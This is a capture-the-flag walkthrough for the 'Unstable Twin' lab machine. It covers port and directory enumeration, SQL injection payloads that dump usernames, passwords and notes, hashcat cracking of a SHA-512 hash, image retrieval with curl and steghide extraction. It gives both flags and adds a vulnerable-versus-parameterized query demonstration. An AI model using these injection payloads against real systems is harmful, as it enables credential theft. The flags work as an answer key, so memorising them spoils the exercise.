Enumeration
Port Scan
# Nmap 7.80 scan initiated Fri Apr 30 20:47:09 2021 as: nmap -sC -sV -oA nmap/output unstabletwin.thm
Nmap scan report for unstabletwin.thm (10.10.59.62)
Host is up (0.56s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 ba:a2:40:8e:de:c3:7b:c7:f7:b3:7e:0c:1e:ec:9f:b8 (RSA)
| 256 38:28:4c:e1:4a:75:3d:0d:e7:e4:85:64:38:2a:8e:c7 (ECDSA)
|_ 256 1a:33:a0:ed:83:ba:09:a5:62:a7:df:ab:2f:ee:d0:99 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 30 20:48:29 2021 -- 1 IP address (1 host up) scanned in 79.55 seconds
Gobuster
monoloco@kali:~$ gobuster dir -u http://unstabletwin.thm -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://unstabletwin.thm
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/04/30 20:50:11 Starting gobuster
===============================================================
/info (Status: 200)
Julias Server
Vincents Server
**Version:** 1.3.4-dev
API Endpoints
Seems like GET method is not allowed
SQLi
Payload: test' union select username,password from users--
Extracted credentials
[ [ "julias", "Red" ], [ "linda", "Green" ], [ "marnie", "Yellow " ], [ "mary_ann", "continue…" ], [ "vincent", "Orange" ] ]
Extract Notes
Payload: test' UNION SELECT 1,notes FROM notes-- -
Password: eaf0651dabef9c7de8a70843030924d335a2a8ff5fd1b13c4cb099e66efe25ecaa607c4b7dd99c43b0c01af669c90fd6a14933422cf984324f645b84427343f4
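The two payloads above work because the API builds its SQL by pasting the request parameter into the statement. The following is an added example (not the challenge's code) that reproduces that defect against a constructed in-memory SQLite database and sets it beside the parameterized form; the table layout, the placeholder note text and the use of SQLite are assumptions, only the usernames and colours come from the writeup.

```python
import sqlite3

# Constructed sample data standing in for the challenge's users/notes tables.
# The note text is a placeholder; the real note held the SHA-512 hash.
USERS = [("julias", "Red"), ("linda", "Green"), ("marnie", "Yellow "),
         ("mary_ann", "continue..."), ("vincent", "Orange")]
NOTES = [(1, "PLACEHOLDER-NOTE")]


def make_db():
    """Build the in-memory database the examples below query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE notes (id INTEGER, notes TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.executemany("INSERT INTO notes VALUES (?, ?)", NOTES)
    return conn


def lookup_vulnerable(conn, name):
    # String concatenation: the request parameter becomes part of the SQL text,
    # so a quote followed by UNION SELECT appends a second query and '--' hides
    # the dangling quote. This is the defect the writeup exploits.
    sql = "SELECT username, password FROM users WHERE username = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    # Bound parameter: the driver sends the value separately from the statement,
    # so the same payload is matched literally as a username and returns nothing.
    sql = "SELECT username, password FROM users WHERE username = ?"
    return conn.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "test' union select username,password from users--"
    print("vulnerable:", lookup_vulnerable(db, payload))   # every row of users
    print("safe:      ", lookup_safe(db, payload))         # []
```

Run it directly to see the same payload dump the whole table through the concatenated query and return an empty result through the parameterized one; the fix is the one-line switch from string building to `?` placeholders.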
Crack the hash (sha-512)
hashcat -m 1700 hash /usr/share/wordlists/rockyou.txt
Extracted Password: experiment
User Flag
Flag: THM{Mary_Ann_notes}
Final Flag
Read server_notes.txt
Now you have found my notes you now you need to put my extended family together.
need to GET their IMAGE for the family album. These can be retrieved by NAME.
You need to find all of them and a picture of myself!
Get pictures
curl http://unstabletwin/get_image?name=julias --output julias.jpg
Script to automate the task of getting all images:
# usernames: one name per line, taken from the users table extracted above
mapfile -t usernames_arr < usernames
for i in "${usernames_arr[@]}"
do
    curl "http://unstabletwin/get_image?name=$i" --output "$i.jpg"
done
Steghide
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf julias.jpg
Passwort eingeben:
Extrahierte Daten wurden nach "julias.txt" geschrieben.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf linda.jpg
Passwort eingeben:
Extrahierte Daten wurden nach "linda.txt" geschrieben.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf marine.jpg
Passwort eingeben:
steghide: Die Datei "marine.jpg" konnte nicht geöffnet werden.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf marnie.jpg
Passwort eingeben:
Extrahierte Daten wurden nach "marine.txt" geschrieben.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf vincent.jpg
Passwort eingeben:
Extrahierte Daten wurden nach "vincent.txt" geschrieben.
monoloco@kali:~/Dokumente/THM/unstabletwin$ steghide extract -sf marie_ann.jpg
Passwort eingeben:
steghide: Die Datei "marie_ann.jpg" konnte nicht geöffnet werden.
What to do next?
cat mary_ann.txt
You need to find all my children and arrange in a rainbow!
The order according to the ROYGBIV
1DVsdb2uEE0k5HK4GAIZPS0Mby2jomUKLjvQ4OSwjKLNAAeCdl2J8BCRuXVXeVYvs6J6HKpZWPG8pfeHoNG1
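The last step is to order the text fragments that steghide wrote out by the colour each user was given in the credentials table, following ROYGBIV. As an added example (not part of the original writeup), the script below does that ordering and concatenation; the fragment contents are constructed placeholders, the user-to-colour mapping is the one extracted via SQLi, and `load_fragments` assumes the steghide outputs are named `<user>.txt` in one directory.

```python
from pathlib import Path

# Rainbow order demanded by the note in mary_ann.txt.
ROYGBIV = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]

# User -> colour, from the users table extracted via SQLi. mary_ann's value
# ("continue...") is not a colour, so she is deliberately absent here.
USER_COLOURS = {
    "julias": "Red",
    "vincent": "Orange",
    "marnie": "Yellow ",   # trailing space is in the extracted data; strip() handles it
    "linda": "Green",
}


def order_fragments(fragments, user_colours=USER_COLOURS):
    """Return (user, fragment) pairs sorted by the ROYGBIV position of the user's colour.

    Raises ValueError for a user whose colour is unknown or not in the rainbow,
    so a stray file (e.g. a mary_ann fragment) is not silently appended."""
    def key(item):
        user = item[0]
        colour = user_colours.get(user, "").strip().lower()
        if colour not in ROYGBIV:
            raise ValueError(f"{user}: colour {colour!r} is not in ROYGBIV")
        return ROYGBIV.index(colour)
    return sorted(fragments.items(), key=key)


def assemble(fragments, user_colours=USER_COLOURS):
    """Concatenate the fragments in rainbow order, stripping surrounding whitespace."""
    return "".join(text.strip() for _, text in order_fragments(fragments, user_colours))


def load_fragments(directory, users):
    """Read the <user>.txt files that steghide extracted (assumed naming)."""
    return {u: Path(directory, f"{u}.txt").read_text() for u in users}


if __name__ == "__main__":
    # Constructed fragments; replace with load_fragments(".", USER_COLOURS) on the real files.
    sample = {"linda": "PART4\n", "julias": "PART1-", "marnie": "PART3-", "vincent": "PART2-"}
    print(assemble(sample))   # PART1-PART2-PART3-PART4
```

With the real `julias.txt`, `vincent.txt`, `marnie.txt` and `linda.txt` in the working directory, `assemble(load_fragments(".", USER_COLOURS))` yields the combined string shown above; the ValueError guard is what catches a file for a user who has no rainbow colour.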
**Final Flag:** You have found the final flag THM{The_Family_Is_Back_Together}